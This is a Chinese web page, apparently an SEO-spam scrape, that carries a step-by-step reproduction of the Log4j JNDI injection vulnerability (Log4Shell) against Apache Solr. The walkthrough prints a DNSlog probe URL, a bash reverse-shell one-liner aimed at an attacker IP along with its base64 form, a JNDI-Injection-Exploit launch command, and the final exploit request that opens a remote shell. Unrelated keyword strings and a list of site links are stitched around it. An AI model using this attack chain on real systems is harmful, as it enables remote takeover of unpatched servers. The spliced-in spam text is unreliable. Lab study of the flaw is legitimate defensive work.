当前位置: 首页 > news >正文

网站开发公司臻动如何刷网站排名

网站开发公司臻动,如何刷网站排名,做微信小程序,wordpress商家目录一、漏洞特征 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的…

一、漏洞特征
Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。
影响版本:Apache Log4j 2.x <= 2.14.1
访问http://192.168.232.131:8983/即可查看到Apache Solr的后台页面
在这里插入图片描述

访问
http://192.168.232.131:8983/solr/admin/cores?action=${jndi:ldap://ugvqt3.dnslog.cn}
dnslog可以收到相关日志
在这里插入图片描述

二、漏洞复现
1.准备payload
bash -i >& /dev/tcp/192.168.245.2/6969 0>&1
192.168.245.2是攻击机ip
base加密:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4yLzY5NjkgMD4mMQ==
在这里插入图片描述

2.开启监听
在这里插入图片描述

3.获取jndi payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4yLzY5NjkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.245.2
这里echo后面就是你加密之后的值,最后面的IP还是攻击机的IP,回车启动
在这里插入图片描述

启动后提取第一个payload:rmi://192.168.245.2:1099/sfvz6q
4.反弹shell
http://192.168.232.131:8983/solr/admin/cores?action=${jndi:rmi://192.168.245.2:1099/sfvz6q}
在这里插入图片描述

http://www.yayakq.cn/news/842499/

相关文章:

  • 北外网院网站建设作业贵阳网站建设技术支持
  • 连云港建设企业网站外贸电子商务网站建设
  • 网站建设规划书实训报告网站差异
  • 泊头公司做网站银川 网站建设
  • 东阿做网站软件开发系统设计
  • 网站标题的作用做网站的后台开发需要会些什么
  • 网站主题说明怎么写wordpress 怎么安装插件
  • 做网站,好苦逼有投标功能的网站怎么做
  • 网站没备案会怎么样电动牙刷开发
  • 有没有找客户的网站海口海南网站建设
  • 品牌网站建设源码订餐网站开发
  • 北京电商购物网站seo 0xu
  • 移动端快速建站的方法营销型网站建设 网络服务
  • 苏州网站排名武安市住房和城乡规划建设局网站
  • 建设网站初步目标咋写吴江区网站建设
  • 做网站域名费向哪里交佛山网站建设怎么选
  • 公司名称域名网站wordpress如何设置阅读权限
  • 企业网站制作查询未来10大暴利行业
  • 创业网站模板网站前台后台模板下载
  • 单位网站开发合同如何快速提高网站关键词排名
  • 花瓣网是仿国外那个网站做的通信管理局 网站备案
  • 分销系统网站最新网站建设技术
  • 网络科技网站设计工商营业执照查询网
  • 湖州 网站建设公司哪家好网站开发技术实验教程
  • 孟村县做网站缙云做网站
  • 中国企业网站泉州网站
  • o2o网站设计方案网站开发代码 免责声明
  • 网站如何申请微信支付市场推广和销售的区别
  • 建设广告网站网站建设策划方案ppt
  • 怎么做网站后台界面免费dedecms企业网站模板